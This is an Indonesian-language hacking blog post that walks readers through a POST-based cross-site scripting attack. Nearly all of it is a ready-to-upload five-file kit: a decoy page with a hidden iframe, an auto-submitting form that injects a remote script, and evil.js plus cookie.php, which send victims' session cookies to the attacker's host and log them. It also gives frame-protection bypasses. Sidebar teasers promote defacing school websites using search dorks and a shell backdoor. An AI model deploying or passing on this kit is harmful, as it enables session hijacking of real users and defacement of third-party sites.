[EN] POST XSS Vulnerability Exploitation

By -
Sebelum membaca artikel ini lebih lanjut, saya anggap kalian sudah memahami basic dari XSS dan HTTP Protocol. Jika belum saya sarankan kalian cari tahu akan kedua hal tersebut.
Apa itu POST XSS?

POST XSS adalah suatu kerentanan disisi client yang digunakan untuk menjalankan malicious script dengan mengirimkan input ke suatu website yang rentan melalui form dengan methode POST dari HTTP Protocol.

Apa Perbedaanya dari GET dalam tahap Eksploitasi?

Dengan methode GET, request dikirim melalui HTTP sebagai berikut:

target.com/halaman.php?contoh=xxx

Sedangkan untuk request POST itu sebagai berikut: 

target.com/halaman.php

Artinya, data yang akan tampil (contoh = xxx ) dikirim sebagai bagian dari body, bukan URL.

Jika kita biasanya hanya mengeksploitasi jenis XSS dengan method GET. Sekarang kita akan belajar mengenai bagaimana cara mengeksploitasi website menggunakan POST XSS.

Tahap Exploit :

Upload 5 file berikut ke hosting kalian, ganti target.com dengan target situs kalian. Ganti variabel form di bawah ini dengan variabel form yang mungkin rentan terhadap XSS.

.htaccess

AddType application/x-httpd-php .html
page.html

    <html>
    <body>
    <H1>Welcome...</H1>
    <p>This page is a innocent page :)</p>
    <? if (isset($_GET[“done”])) {
    die();
    }?><iframe src=”http://webmu.com/background.php" width=”1" height=”1" frameborder=”0"></iframe>
    </body>
    </html>
background.php

    <html>
    <head>
    <style>
    .xss {display: none;
    }
    </style>
    </head>
    <body onload=”XSS.submit();”>
    <form id=”xss” action=”http://www.target.com/path/” method=”post” name=”XSS”>
    <input name=”target” value =”all”></input>
    <input name=”address” value=”<SCRIPT SRC=’http://webmu.com/evil.js'></SCRIPT>"></input>
    </form>
    </body>
    </html>
evil.js

window.location.replace(“http://webmu.com/cookie.php?cookie=" + encodeURIComponent(document.cookie));
cookie.php

    <?
    $file = “cookies.txt”;
    if (isset($_GET[“cookie”])) {$handle = fopen($file, ‘a’);fwrite($handle, “\r\n” . $_GET[“cookie”]);fclose($handle);
    }
    ?>
    <script>window.location.replace(“http://webmu.com/page.html?done=yes");</script>

Jadi apa yang terjadi di sini?
Iframe di webmu.com/page.html yang dikirim ke target yang membuka file background.php, yang memiliki form login yang mirip seperti situs aslinya. Ketika web sudah terload semuanya,  javascript "onload", disini akan mentriger. 

Beberapa bypass yang bisa dilakukan :

X-Frame-Options: Deny
Jika kalian menemukan pesan seperti itu bypass nya cukup sederhana, cukup dengan meta redirection dari page.html: 

<meta http-equiv=”refresh” content=”0;URL=’http://webmu.com/background.php'">
Atau kalian bisa mengganti payload iframe dengan payload dibawah ini :

<SCRIPT SRC = ‘http://webmu.com/background.php’> </SCRIPT>

Referensi : @ahmetumitbayram via medium.com

Kalian mungkin juga tertarik :



Comments

Post a Comment

Popular posts from this blog

[BUG BOUNTY] Email Spoofing | No Valid SPF Record

By -
Image
Sekian lama tidak aktif ngeblog lagi, kali ini saya ingin sharing kembali mengenai salah satu celah yang saya temukan di salah satu website pembayaran elektronik lokal Indonesia. Vulnerability jenis apa yang saya temukan ? Awal mulanya saya melakukan footprinting dan melakukan information gathering dengan keinginan mendapatkan sebuah keberentungan, alhasil saya hanya menemukan sebuah file i.php yang menampilkan konfigurasi PHP yang dipakai pada web tersebut. Jika dilaporkan pun hanya akan dianggap sebagai "Information Disclosure". saya sempat berhenti sejenak sampai disini sampai ada teman saya yang memberikan sebuah link referensi mengenai email spoofing. Apa sih Email Spoofing itu ?  Email spoofing adalah pemalsuan pada bagian header email, sehingga email yang dikirim seolah-olah dikirimkan dari email yang valid. e-mail spoofing umumnya digunakan untuk aktivitas spamming, phishing atau fraud. Contoh email spoof biasanya dikirimkan dengan menyamarkan alamat email sebenarnya
Read more

Legion Tutorial - Information Gathering (Kali Linux)

By -
Image
Halo teman teman, kali ini saya akan membagikan tutorial tentang legion  Apa itu legion? Legion, sebuah cabang dari SECFORCE's Sparta, adalah kerangka kerja pengujian penetrasi jaringan open source, mudah digunakan, super-extensible dan semi-otomatis yang membantu dalam penemuan, pengintaian dan eksploitasi sistem informasi. Fitur : Pengintaian dan pemindaian otomatis dengan NMAP, whataweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyzer, webslayer, dan lainnya (dengan hampir 100 skrip terjadwal otomatis) Antarmuka grafis yang mudah digunakan dengan menu dan panel konteks yang kaya yang memungkinkan pentester dengan cepat menemukan dan mengeksploitasi vektor serangan pada host Fungsionalitas modular memungkinkan pengguna untuk dengan mudah menyesuaikan Legiun dan secara otomatis memanggil skrip / alat mereka sendiri Pemindaian panggung yang sangat dapat disesuaikan untuk penghindaran IPS seperti ninja Deteksi otomatis CPE (Penghitungan Platform Umum) dan CVE (Kerentanan dan Eksp
Read more

Deface web with auto sql balitbang method

By -
Image
Assalamualaikum wr.wb Kali ini mimin akan mengshare cara mendeface di cms balitbang BAHAN 1. Shell Backdoor 2. Google chrome / browser 3. Hp / laptop 4. Tools auto sql balitbang  touch me senpai 5. Tools Crack Password sql balitbang  touch me senpai 6.  Dork / exploit: DorK BalitBang > inurl:/html/index.php site:sch.id  > inurl:/html/siswa site:sch.id  > inurl:/html/guru site:sch.id  > inurl:/html/alumni site:sch.id > inurl:member/daftar.php intext:NAMAKOTA > inurl:/sch.id Team balitbang intext:NAMAKOTA > intext:"Kamfret Team"sch.id Team Balitbang > inurl:/member/daftar.php > inurl:"/html/index.php" intext:"Tim Balitbang" > inurl:"/html/index.php" intitle:"Selamat Datang" > inurl:"/member/" intext:"Tim Balitbang" > inurl:"/html/siswa.php?" > inurl:"/html/alumni.php?" > inurl:"/html/guru.php?" > inurl:/member/daftar.php intext:"namakota&qu
Read more